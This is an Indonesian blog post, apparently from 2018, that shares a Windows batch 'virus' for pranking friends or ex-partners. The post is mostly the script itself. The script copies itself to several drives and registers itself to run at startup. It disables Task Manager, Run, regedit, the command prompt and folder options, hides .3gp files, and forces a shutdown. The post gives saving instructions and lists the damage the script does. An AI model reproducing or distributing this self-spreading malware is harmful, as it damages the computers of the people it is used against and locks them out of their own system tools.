Sabtu, 20 Januari 2018

Cara membuat virus

Ok kali ini gue
bakal share script virus yang bisa kalian pakek buat ngerjain temen or mantan :v
Eet...tapi kalo buat ngerjain temen jangan deh soalnya ini agak berbahaya sih. Ok langsung aja scriptnya di bawah ya..
Bahan:
-Pc
-Notepad

Jika bahan sudah lengkap silahka copy scrip dibawah


Echo off > C:\virxx.txt
if no exist C:\Windows\%0 copy %0 C:\Windows
for %%p in (A C D E F G H) do copy %0 %%p:
for %%q in (A C D E F G H) do dir %%q:\*.3gp /B /S >> C:\virxx.txt
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind
/t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableTaskMgr /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFolderOptions /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v
ShowSuperHiden /t REG_DWORD /d 0 /f
for %%r in (A C D E F G H) do attrib +h +s %%r:\*.3gp /s
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
/t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v gorun /t REG_SZ /d
C:\Windows\virxx.bat /f
REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d
2 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoViewOnDrive /t REG_DWORD /d 4 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableRegedit /t REG_DWORD /d 1 /f
Shutdown -s -t 360 -c “Virus Menjangkiti Komputer Anda” -f
Exit

cara membuatnya :
- copy script di atas ke notepad
- save dengan nama terserah ente, dan di akhiri dengan .bat ( contoh : virus.bat )

kerusakan yang bisa di sebabkan jika virus ini di jalankan :
menghilangkan task manager, run, regedit, folder option, dan akan menyembunyikan file yang berekstensi *.3gp dengan super hidden. Selain itu virus akan berkembang biak dengan mengkopykan dirinya ke drive A, C, D, E, F, G, dan setrusnya.

Ok sekian dari saya moga tutor or postingan-postingan gue bisa menambah wawasan kalian